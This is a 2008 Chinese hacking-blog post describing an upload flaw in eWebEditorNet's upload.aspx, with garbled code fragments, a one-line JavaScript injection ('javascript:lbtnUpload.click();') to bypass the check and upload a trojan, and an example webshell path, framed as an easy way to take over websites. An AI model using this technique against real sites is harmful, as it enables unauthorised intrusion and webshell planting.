内容正在载入中,请稍后……
站长简介

ID:SpookZanG
Age:20
QQ:964890(长隐)
设为首页
加入收藏夹
Email:SpookZanG#Gmail.Com
收藏到QQ书签
最新日志
最新评论
其他
登入
注册
申请链接
RSS: 日志 | 评论
编码:UTF-8
XHTML 1.0
选择模板
日历
< 2008 >    < 11 >
1
2345678
9101112131415
16171819202122
23242526272829
30
统计
访问次数 1500863
今日访问 365
日志数量 318
评论数量 172
在线人数 15
链接
订阅
抓虾
google reader
哪吒
关闭横幅广告 关闭左侧栏 关闭右侧栏 窄屏幕 默认屏幕 宽屏幕 自适应屏幕 增加字号 减小字号 订阅RSS
4 Sep.2008

eWebEditorNet 漏洞 upload.aspx

作者: spookzang   分类:脚本相关   出处:本站原创            | |
来源:坏狼安全网
eWebEditorNet 主要是一个upload.aspx文件存在上传漏洞。
原理:

代码

    
"uploadfile" style="file" size="uploadfile" runat=
"lbtnUpload" runat=
"JavaScript">

只是简单的对ID进行验证,只要构造javascript:lbtnUpload.click();满足条件达到上传木马的效果。成功以后查看源代码
代码

a "lbtnUpload" "javascript:__doPostBack('lbtnUpload','')"script 'javascript'

木马的具体地址为
/eWebEditorNet/UploadFile/200801141044412198.cer
这样就轻松的拿下了一个网站。
时间:09:27 评论(3) 引用(0) 阅读(258) Tags:
bbbb
2008/09/04 17:43
ho~ho~
spookzang 回复于 2008/09/04 17:45
恩?
wrree
2008/09/04 17:42
就是啊 漏洞多多~
spookzang 回复于 2008/09/04 17:45
恩呢喃喃
6&8
2008/09/04 11:36
EWEBEDITOR  老有漏洞啊~  哎
spookzang 回复于 2008/09/04 17:45
是啊啊啊啊
分页: 1/1 第一页 1 最后页
发表评论
  昵称 [注册]
  密码 (游客无需密码)
  网址
  电邮
OpenID登入 权限选项 表情